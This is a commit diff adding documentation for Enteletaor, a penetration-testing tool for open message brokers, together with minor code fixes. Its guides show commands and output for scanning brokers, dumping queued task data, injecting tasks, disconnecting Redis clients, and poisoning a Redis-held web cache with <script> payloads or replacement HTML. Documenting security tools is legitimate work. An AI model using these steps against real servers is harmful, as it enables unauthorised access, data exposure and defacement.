[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with server...
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: aletha@cordell.com
[ * ] -> P1: Best of Groupon: The Deals That Make Us Proud (Unlike Our Nephew, Steve) Happy Birthday Lindsay - Surprise Inside!
[ * ] -> P2: Berlin by Soviet and Polish troops and the refusal of Japan to surrender under its terms, the United States dropped atomic bombs on the Eastern Front, the Allied invasion of Poland by Germany and the Axis.
[ * ] Found process information:
[ * ] - Remote tasks name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: amie@cordell.com
[ * ] -> P1: Read your review for John Mulaney You're missing out on points Not Cool, Guys DO NOT Commit These Instagram Atrocities
[ * ] -> P2: MolotovRibbentrop Pact of August 1939, Germany and subsequent declarations of war in Europe concluded with an invasion of Poland by Germany and the subsequent German unconditional surrender on 8 May 1945.
[ * ] -> P2: In June 1941, the European Axis powers and the coalition of the world.
[ * ] -> No more messages from server. Waiting for 4 seconds and try again..
[ * ] -> No more messages from server. Waiting for 4 seconds and try again..
[ * ] -> No more messages from server. Waiting for 4 seconds and try again..
[ * ] -> No more messages from server. Waiting for 4 seconds and try again..
Output file
___________
We can export results to a CSV file using the ``--output`` option. The reason to choose this format is that it permits real-time reading. In other words:
Imagine you want to put Enteletaor in streaming mode and, at the same time, have another process read the information from the export file; CSV allows this because each line is independent of the others.
Enteletaor stores the CSV in *append* mode, so it will not overwrite old file content:
.. code-block:: bash
# enteleteaor tasks raw-dump -t 10.10.0.10 --streaming --output dumped_server_file
And, in other console, we can write:
.. code-block:: bash
# tail -f dumped_server_file.csv
.. note::
If not extension provided, enteleteaor automatically add .csv
Inject new tasks
++++++++++++++++
Finally, enteleteaor permit us to inject new tasks to the broker flow. The injection only accept one parameter: ``-f`` (``--function-file``).
This parameter need a JSON file as input with the function parameters. Do you remember `Export template`_ option of the list-tasks sub-command?
Once we have the JSON file, we can inject the new process:
.. code-block:: bash
# enteleteaor tasks inject -f my_template.json
[ * ] Starting Enteletaor execution
[ * ] - Building process...
[ * ] - Trying to connect with server...
[ * ] - Sending processes to '10.10.0.10'
[ * ] 1) tasks.send_mail
[ * ] Done!
Redis
-----
Redis is a powerful and versatile server. It can act as:
- Key-value database
- Broker
- Cache
- ...
So, it has it own command and actions:
Getting info
++++++++++++
This action was explained in :doc:`quickstart` document.
Listing connected users
+++++++++++++++++++++++
This action was explained in :doc:`quickstart` document.
Disconnecting users
+++++++++++++++++++
Not only can we show all connected users, we can also disconnect them. To do that we can use the ``disconnect`` sub-command.
Disconnect one user
___________________
This command need as input the client to disconnect. Client must be as format: IP:PORT, as ``connected`` command displays.
.. code-block:: bash
:linenos:
:emphasize-lines: 7,13
# enteleteaor redis connected -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Connected users to '10.10.0.10':
[ * ] - 10.10.0.2:52748 (DB: 0)
[ * ] - 10.10.0.2:52749 (DB: 0)
[ * ] - 10.10.0.2:52752 (DB: 0)
[ * ] - 127.0.0.1:42262 (DB: 0)
[ * ] - 10.10.0.2:51200 (DB: 0)
[ * ] Done!
# enteleteaor redis disconnect -t 10.10.0.10 -c 127.0.0.1:42262
[ * ] Starting Enteletaor execution
[ * ] - Client '127.0.0.1:42264' was disconnected
[ * ] Done!
Disconnect all users
____________________
If you want to disconnect all connected users, enteleteaor has the shortcut ``--all``:
.. code-block:: bash
# enteleteaor redis disconnect -t 10.10.0.10 --all
Discovering DBs
+++++++++++++++
By default Redis has 16 databases, but you can add as many as you need. If the database used by the remote server is different to 0 (default database) and you need to discover them, you can use ``discover-dbs``:
.. code-block:: bash
# enteleteaor redis discover-dbs -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Discovered '10.10.0.10' DBs at '16':
[ * ] - DB0 - 4 keys
[ * ] - DB1 - Empty
[ * ] - DB2 - Empty
[ * ] - DB3 - Empty
[ * ] - DB4 - Empty
[ * ] - DB5 - Empty
[ * ] - DB6 - Empty
[ * ] - DB7 - Empty
[ * ] - DB8 - Empty
[ * ] - DB9 - Empty
[ * ] - DB10 - Empty
[ * ] - DB11 - Empty
[ * ] - DB12 - Empty
[ * ] - DB13 - Empty
[ * ] - DB14 - Empty
[ * ] Done!
Dumping information
+++++++++++++++++++
Basic usage
___________
One of the more interesting things is displaying the information stored in Redis, with the possibility to export it.
``dump`` sub-command permit that:
.. code-block:: bash
# enteleteaor redis dump -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with redis server...
[ * ] "b'unacked'":
[ * ] {
[ * ] "b'a3b415a9-2ce1-4386-b104-94b9a38aee73'":
[ * ] {
[ * ] "content-encoding": "b'binary'"
[ * ] "properties":
[ * ] {
[ * ] "body_encoding": "b'base64'"
[ * ] "delivery_mode": "2"
[ * ] "delivery_info":
[ * ] {
[ * ] "priority": "0"
[ * ] "exchange": "b'celery'"
[ * ] "routing_key": "b'celery'"
[ * ] }
[ * ] "delivery_tag":
[ * ] {
[ * ] "delivery_tag": "b'a3b415a9-2ce1-4386-b104-94b9a38aee73'"
[ * ] }
[ * ] "headers":
[ * ] {
[ * ] }
[ * ] "body":
[ * ] {
[ * ] "chord": "None"
[ * ] "retries": "0"
[ * ] "kwargs":
[ * ] {
[ * ] }
[ * ] "task": "b'tasks.send_mail'"
[ * ] "errbacks": "None"
[ * ] "taskset": "None"
[ * ] "timelimit": "(None, None)"
[ * ] "callbacks": "None"
[ * ] "eta": "None"
[ * ] "id":
[ * ] {
[ * ] "id": "b'8d772bd5-7f2c-4bef-bc74-aa582aaf0520'"
[ * ] "expires": "None"
[ * ] "utc": "True"
[ * ] "args": "('leatha@elidia.com', 'Guys DO NOT Commit These Instagram Atrocities 10 Engagement Tips to Gobble Over Thanksgiving Buffer has been hacked - here', 'Declaration by the Western Allies and the refusal of Japan to surrender under its terms, the United States emerged as an effort to end pre-war enmities and to create a common identity.')"
[ * ] }
[ * ] "content-type":
[ * ] {
[ * ] "content-type": "b'application/x-python-serialize'"
[ * ] }
[ * ] Done!
Exporting results
_________________
Don't worry if above console output is a bit heavy, we can export results to a JSON file using ``-e`` (``--export-results``):
.. code-block:: bash
# enteleteaor redis dump -t 10.10.0.10 -e dumped_info
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with redis server...
[ * ] - Storing information into 'results.json'
[ * ] "b'unacked'":
[ * ] {
[ * ] "b'a3b415a9-2ce1-4386-b104-94b9a38aee73'":
[ * ] {
[ * ] "content-encoding": "b'binary'"
[ * ] "properties":
[ * ] {
[ * ] "body_encoding": "b'base64'"
[ * ] "delivery_mode": "2"
[ * ] "delivery_info":
[ * ] {
[ * ] "priority": "0"
[ * ] "exchange": "b'celery'"
[ * ] "routing_key": "b'celery'"
[ * ] }
[ * ] "delivery_tag":
[ * ] {
[ * ] "delivery_tag": "b'a3b415a9-2ce1-4386-b104-94b9a38aee73'"
[ * ] }
[ * ] "headers":
[ * ] {
[ * ] }
[ * ] "body":
[ * ] {
[ * ] "chord": "None"
[ * ] "retries": "0"
[ * ] "kwargs":
[ * ] {
[ * ] }
[ * ] "task": "b'tasks.send_mail'"
[ * ] "errbacks": "None"
[ * ] "taskset": "None"
[ * ] "timelimit": "(None, None)"
[ * ] "callbacks": "None"
[ * ] "eta": "None"
[ * ] "id":
[ * ] {
[ * ] "id": "b'8d772bd5-7f2c-4bef-bc74-aa582aaf0520'"
[ * ] "expires": "None"
[ * ] "utc": "True"
[ * ] "args": "('leatha@elidia.com', 'Guys DO NOT Commit These Instagram Atrocities 10 Engagement Tips to Gobble Over Thanksgiving Buffer has been hacked - here', 'Declaration by the Western Allies and the refusal of Japan to surrender under its terms, the United States emerged as an effort to end pre-war enmities and to create a common identity.')"
[ * ] }
[ * ] "content-type":
[ * ] {
[ * ] "content-type": "b'application/x-python-serialize'"
[ * ] }
[ * ] Done!
.. note::
We don't need to put the extension .json to file. If extension is missing, enteleteaor will add it.
Hide screen output
__________________
If you don't want to display information on the screen (useful when Redis contains a lot of information), use the ``--no-screen`` option:
.. code-block:: bash
# enteleteaor redis dump -t 10.10.0.10 -e dumped_info --no-screen
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with redis server...
[ * ] - Storing information into 'results.json'
[ * ] Done!
Handling cache
++++++++++++++
Redis is commonly used as a centralized cache system. We can handle this cache stored in it.
Finding cache keys
__________________
The first step is to find possible cache keys in Redis. Enteletaor has the ``--search`` option that will try to find these keys:
.. code-block:: bash
# enteleteaor redis cache -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Looking for caches in '10.10.0.10'...
[ * ] - Possible cache found in key: b'flask_cache_view//'
[ * ] Done!
Dumping all cache keys
______________________
If we want to dump possible cache keys in a raw way (not only locate them), we omit the ``--search`` option:
.. code-block:: bash
# enteleteaor redis cache -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Listing cache information:
[ * ] -> Key: 'b'flask_cache_view//'' -
[ * ] -> Content:
!X<!--
Author: WebThemez
Author URL: http://webthemez.com
License: Creative Commons Attribution 3.0 Unported
License URL: http://creativecommons.org/licenses/by/3.0/
-->
<!doctype html>
<!--[if IE 7 ]> <html lang="en-gb" class="isie ie7 oldie no-js"> <![endif]-->
<!--[if IE 8 ]> <html lang="en-gb" class="isie ie8 oldie no-js"> <![endif]-->
<!--[if IE 9 ]> <html lang="en-gb" class="isie ie9 no-js"> <![endif]-->
<!--[if (gt IE 9)|!(IE)]><!-->
<html lang="en-en" class="no-js">
<!--<![endif]-->
<head>
...
[ * ] Done!
Dumping specific cache key
__________________________
We can dump only an specific key:
.. code-block:: bash
# enteleteaor redis cache -t 10.10.0.10 --cache-key "flask_cache_view//"
[ * ] Starting Enteletaor execution
[ * ] - Listing cache information:
[ * ] -> Key: 'b'flask_cache_view//'' -
[ * ] -> Content:
!X<!--
Author: WebThemez
Author URL: http://webthemez.com
License: Creative Commons Attribution 3.0 Unported
License URL: http://creativecommons.org/licenses/by/3.0/
-->
<!doctype html>
<!--[if IE 7 ]> <html lang="en-gb" class="isie ie7 oldie no-js"> <![endif]-->
<!--[if IE 8 ]> <html lang="en-gb" class="isie ie8 oldie no-js"> <![endif]-->
<!--[if IE 9 ]> <html lang="en-gb" class="isie ie9 no-js"> <![endif]-->
<!--[if (gt IE 9)|!(IE)]><!-->
<html lang="en-en" class="no-js">
<!--<![endif]-->
<head>
...
[ * ] Done!
Basic cache poisoning
_____________________
Enteletaor permits us to poison the cache. To enable poisoning we need to use the ``-P`` option.
By default, Enteletaor will try to inject an HTML <script> tag with an alert message:
.. code-block:: bash
# enteleteaor redis cache -P -t 10.10.0.1
[ * ] Starting Enteletaor execution
[ * ] - Trying to connect with redis server...
[ * ] - Poisoning enabled
[ * ] - Poisoned cache key 'flask_cache_view//' at server '10.10.0.10'
[ * ] Done!
Custom cache poisoning with
___________________________
We can replace the default behavior adding a custom script code:
**Inline**:
Using ``--payload`` option. This option need a file with the script:
.. code-block:: bash
# enteleteaor redis cache -P -t 10.10.0.10 --payload "<script>document.write('Say cheeeeers')</script>"
[ * ] Starting Enteletaor execution
[ * ] - Poisoning enabled
[ * ] - Poisoned cache key 'b'flask_cache_view//'' at server '10.10.0.10'
[ * ] Done!
**Using file**:
.. code-block:: bash
# echo "<script>document.write('Say cheeeeers')</script>" > my_payload.txt
# enteleteaor redis cache -P -t 10.10.0.10 --file-payload my_payload.txt
[ * ] Starting Enteletaor execution
[ * ] - Poisoning enabled
[ * ] - Poisoned cache key 'b'flask_cache_view//'' at server '10.10.0.10'
[ * ] Done!
Replace cache content
_____________________
Finally, we can replace entire content of cache key using option ``--replace-html``:
.. code-block:: bash
# echo "<html><head><title>Replaced content</title></head><body><h1>Say cheeeeers again :)</h1></body></html>" > new_html.html
# enteleteaor redis cache -P -t 10.10.0.10 --replace-html new_html.html
[ * ] Starting Enteletaor execution
[ * ] - Poisoning enabled
[ * ] - Poisoned cache key 'flask_cache_view//' at server '10.10.0.10'
[ * ] Done!

313
doc/source/conf.py Normal file
View File

@@ -0,0 +1,313 @@
# -*- coding: utf-8 -*-
#
# Documentation build configuration file, created by
# sphinx-quickstart on Wed Feb 11 01:21:33 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# NOTE(review): os and sys appear unused below — presumably kept for the
# commented-out sys.path.insert() tweak underneath; confirm before removing.
import os
import sys
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Enteletaor'
# NOTE(review): the copyright string starts with ', ' — the year looks
# missing; confirm the intended value (e.g. u'2016, Daniel Garcia ...').
copyright = u', Daniel Garcia (cr0hn) - @ggdaniel'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'enteletaor'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
# NOTE(review): latex_documents is not defined here, so the 'latex' build
# target relies on Sphinx defaults — confirm this is intentional.
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
# NOTE(review): man_pages / texinfo_documents are likewise not defined in
# this section or the next — the 'man' and 'texinfo' targets will warn.
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
# The basename for the epub file. It defaults to the project name.
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the PIL.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True

60
doc/source/index.rst Normal file
View File

@@ -0,0 +1,60 @@
.. Documentation master file, created by
sphinx-quickstart on Wed Feb 11 01:21:33 2015.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Welcome to Enteletaor documentation!
====================================
.. figure:: ../images/enteletaor-logo-150px.png
:align: left
Enteletaor is a message Queue & Broker Injection tool.
+----------------+------------------------------------+
|Project site | http://github.com/cr0hn/enteletaor |
+----------------+------------------------------------+
|Documentation | http://enteletaor.readthedocs.org |
+----------------+------------------------------------+
|Author | Daniel Garcia (cr0hn) - @ggdaniel |
+----------------+------------------------------------+
|Last Version | 1.0.0 |
+----------------+------------------------------------+
|Python versions | 2.7.x & 3.x                        |
+----------------+------------------------------------+
Quick project description
-------------------------
Enteletaor is a tool that can handle information from open brokers.
Some of the actions you can do:
- Listing remote tasks.
- Read remote task content.
- Disconnect remote clients from Redis server (even the admin!)
- Inject tasks into remote processes.
- Make a scan to discover open brokers.
Currently supported brokers are:
- RabbitMQ (or AMQP compatible).
- ZeroMQ.
- Redis.
Content Index
-------------
.. toctree::
:maxdepth: 3
installation
quickstart
advanced
Licence
-------
I believe in freedom, so Enteletaor is released under BSD license.

View File

@@ -0,0 +1,94 @@
Installation
============
Dependencies
------------
First, make sure you have installed these packages:
Python 2 & 3
++++++++++++
.. code-block:: bash
# sudo apt-get install -y libzmq3 libzmq3-dev
Python 3 only (recommended)
+++++++++++++++++++++++++++
.. code-block:: bash
# sudo apt-get install -y python3-pip
Python 2 only
+++++++++++++
.. code-block:: bash
# sudo apt-get install -y python2.7-dev
Installation from PIP (recommended)
-----------------------------------
The easiest way to install Enteletaor is from PyPI. To do this, just run:
Python 2
++++++++
.. code-block:: bash
# python -m pip install enteletaor
Python 3
++++++++
.. code-block:: bash
# python3 -m pip install enteletaor
Then run Enteletaor by typing:
.. code-block:: bash
# enteleteaor -h
or, in Python 3:
.. code-block:: bash
# enteleteaor3 -h
.. note::
Remember that, if you install enteleteaor in **Python 3** executable will be called **enteletaor3** -> ending in **3**.
If you install in **Python 2** executable will be **enteletaor**, without 3.
Installation from source
------------------------
Alternatively, you can download the source code from GitHub using git:
.. code-block:: bash
git clone https://github.com/cr0hn/enteleteaor.git enteleteaor
Next you need to install dependencies from ``requirements.txt``:
.. code-block:: bash
pip install -r requirements.txt
.. note::
If you're not running Enteletaor in a virtualenv, you probably need to be root to install the requirements. In that case, you can use the ``sudo`` command.
Finally you can run enteleteaor:
.. code-block:: bash
# cd enteleteaor_lib
# python enteleteaor.py -h

201
doc/source/quickstart.rst Normal file
View File

@@ -0,0 +1,201 @@
Quick Start
===========
Enteletaor has 3 super commands available:
- scan: scanner that discovers open brokers.
- tasks: handle remote tasks.
- redis: specific actions for Redis server.
This document contains an overview of Enteletaor with some examples for each super command. If you want to learn more, visit the :doc:`attacks`.
Python versions
---------------
Enteletaor can run on Python 2.7.x and 3.x. Python 3 is recommended, but you can use Python 2.7 without any problem.
Getting help
------------
Super commands ``tasks`` and ``redis`` have many sub-options; you can get help using ``-h`` with each super command:
.. code-block:: bash
:linenos:
:emphasize-lines: 9-14
# enteleteaor scan -h
usage: enteletaor.py redis [-h]
{info,disconnect,dump,cache,discover-dbs,connected}
...
positional arguments:
{info,disconnect,dump,cache,discover-dbs,connected}
redis commands:
info open a remote shell through the Redis server
disconnect disconnect one or all users from Redis server
dump dumps all keys in Redis database
cache poison remotes cache using Redis server
discover-dbs discover all Redis DBs at server
connected get connected users to Redis server
optional arguments:
-h, --help show this help message and exit
Setting verbosity level
-----------------------
Enteletaor has 5 levels of verbosity; you can set the level by adding ``-v`` to the command line:
.. code-block:: bash
# enteleteaor -v scan -t 10.10.0.10
# enteleteaor -vvvv scan -t 10.10.0.10
.. note::
Be careful to put ``-v`` between ``enteletaor`` and the top action:
- enteleteaor -vv scan ... -> **GOOD**
- enteleteaor scan -vv ... -> **BAD**
Quick scan
----------
You can quickly try to discover whether a host has open brokers by running:
.. code-block:: bash
# enteleteaor -v scan -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Number of targets to analyze: 1
[ * ] - Starting scan
[ * ] > Analyzing host '10.10.0.10'
[ * ] <!!> Open 'RabbitMQ' server found in port '5672' at '10.10.0.10'
[ * ] <!!> Open 'Redis' server found in port '6379' at '10.10.0.10'
[ * ] <!!> Open 'ZeroMQ' server found in port '5555' at '10.10.0.10'
[ * ] - Open services found:
[ * ] -> Host - 10.10.0.10
[ * ] * 6379/TCP [Redis]
[ * ] * 5672/TCP [RabbitMQ]
[ * ] * 5555/TCP [ZeroMQ]
[ * ] Done!
You can also analyze an entire network:
.. code-block:: bash
# enteleteaor scan -t 10.10.0.10/24
Remote tasks
------------
Listing remote tasks
++++++++++++++++++++
With Enteletaor you can handle remote tasks; for example, you can list pending tasks by running:
.. code-block:: bash
# enteleteaor -v tasks list-tasks -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] - Remote process found:
[ * ] -> tasks.send_mail (param_0:str, param_1:str, param_2:str)
[ * ] Done!
Enteletaor is telling us that it has discovered a task, called ``tasks.send_mail``, with 3 parameters, and which type each position has.
The tool can't discover the parameter names, so it indicates their positions. This task could match the following function, e.g.:
.. code-block:: python
:linenos:
:emphasize-lines: 3,6,9
def send_mail(to, sender, message):
"""
:param to: mail destination
:type to: str
:param sender: mail sender
:type sender: str
:param message: content of message
:type message: str
"""
# Code that sends the e-mail
Dump tasks content
++++++++++++++++++
Enteletaor not only permits listing remote tasks; it can also dump the task contents:
.. code-block:: bash
:linenos:
:emphasize-lines: 6-8,12-14,18-20
# enteleteaor tasks raw-dump -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Found process information:
[ * ] - Remote process name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: particia@stephnie.com
[ * ] -> P1: Open This Email The broke girl's guide to a luxury vacation What Can You Afford?
[ * ] -> P2: Asia and the Pacific and was already at war with the invasion of the United States emerged as rival superpowers, setting the stage for the Cold War, which lasted for the next 46 years.
[ * ] Found process information:
[ * ] - Remote process name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: eveline@stephnie.com
[ * ] -> P1: Can You Afford?
[ * ] -> P2: Berlin by Soviet and Polish troops and the coalition of the United Kingdom and the United States and European territories in the Pacific, the Axis lost the initiative and undertook strategic retreat on all fronts.
[ * ] Found process information:
[ * ] - Remote process name: 'tasks.send_mail'
[ * ] - Input parameters:
[ * ] -> P0: milford@stephnie.com
[ * ] -> P1: Hey Don't Open This Email The broke girl's guide to a luxury vacation What Can You Afford?
[ * ] -> P2: European neighbours, Poland, Finland, Romania and the Axis.
[ * ] No more messages from server. Exiting...
[ * ] Done!
Redis
-----
Redis is powerful software with many options, so it has a specific super command.
Getting remote Redis info
+++++++++++++++++++++++++
If you want to list remote Redis server information, just type:
.. code-block:: bash
# enteleteaor redis info -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Config for server '10.10.0.10':
[ * ] - appendonly: no
[ * ] - auto-aof-rewrite-min-size: 67108864
...
[ * ] - timeout: 0
[ * ] - databases: 16
[ * ] - slave-priority: 100
[ * ] - dir: /var/lib/redis
[ * ] Done!
Listing users
+++++++++++++
We can also list all users connected to the Redis server. A user could be a web application (that uses Redis as a cache), a monitoring system or even the administrator.
.. code-block:: bash
# enteleteaor redis connected -t 10.10.0.10
[ * ] Starting Enteletaor execution
[ * ] Connected users to '10.10.0.10':
[ * ] - 10.10.0.2:52748 (DB: 0)
[ * ] - 10.10.0.2:52749 (DB: 0)
[ * ] - 10.10.0.2:52752 (DB: 0)
[ * ] - 127.0.0.1:42262 (DB: 0)
[ * ] - 10.10.0.2:53095 (DB: 0)
[ * ] Done!
Localhost addresses usually are local monitoring or admin.

View File

@@ -3,7 +3,7 @@
# --------------------------------------------------------------------------
# Run Boot loader
# --------------------------------------------------------------------------
if __package__ == "enteletaor_lib":
if __package__ == "enteletaor_lib" or __name__ == "enteletaor_lib":
from .libs.core.bootloader import boot_loader

View File

@@ -33,7 +33,7 @@ __banner__ = """
____ _ _ ___ ____ _ ____ ___ ____ ____ ____
|___ |\ | | |___ | |___ | |__| | | |__/
|___ | \| | |___ |___ |___ | | | |__| | \\
"""
""" # Font name: Cyberlarge
# --------------------------------------------------------------------------
# Generic global config

View File

@@ -29,7 +29,7 @@ def setup_cmd():
class STBArgumentParser(_argparse.ArgumentParser):
def parse_args_and_run_hooks(self, args=None, namespace=None):
parsed_args = super(STBArgumentParser, self).parse_args(args, namespace)
parsed_args = super(self.__class__, self).parse_args(args, namespace)
# Run hooks
self.run_hooks(parsed_args)

View File

@@ -1,18 +1,6 @@
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
def get_user_config_path():
"""
"""
# ----------------------------------------------------------------------
def get_project_config_path():
"""
"""
from __future__ import absolute_import
# ----------------------------------------------------------------------
@@ -24,7 +12,7 @@ def load_config():
try:
from config import __author__, __tool_name__, __site__, __version__
except ImportError:
__author__ = __name__ = __site__ = __version__ = "unknown"
__author__ = __tool_name__ = __site__ = __version__ = "unknown"
from .structs import AppSettings

View File

@@ -1,165 +0,0 @@
# -*- coding: utf-8 -*-
from schematics.exceptions import ConversionError, ValidationError
from schematics.models import Model as _Model
from schematics.types import BaseType as _BaseType, utf8_decode, unicode
from schematics.types import (StringType, IntType, FloatType, DateTimeType, IPv4Type,
URLType, EmailType, NumberType, LongType, DecimalType,
HashType, SHA1Type, BooleanType, DateType, UUIDType)
from schematics.types.compound import ListType
# region Monkey Patch
# --------------------------------------------------------------------------
# Monkey patch fo Schematics to add:
# - New property for types: "description"
# - Constructor of models without dicts, using instead **kwargs
# --------------------------------------------------------------------------
def __str__(self):
return self.description
# ----------------------------------------------------------------------
def new_init(self, required=False, default=None, serialized_name=None,
choices=None, validators=None, deserialize_from=None,
serialize_when_none=None, messages=None,
# Custom parameters
description="Field description", is_file_results=False):
# Call original constructor
_BaseType.old__init__(self, required, default, serialized_name, choices, validators, deserialize_from,
serialize_when_none, messages)
if not isinstance(description, str):
raise TypeError("Expected str, got '%s' instead" % type(description))
if not isinstance(is_file_results, bool):
raise TypeError("Expected bool, got '%s' instead" % type(is_file_results))
self.description = description
self.is_file_results = is_file_results
# Monkey patch!
_BaseType.old__init__ = _BaseType.__init__
_BaseType.__init__ = new_init
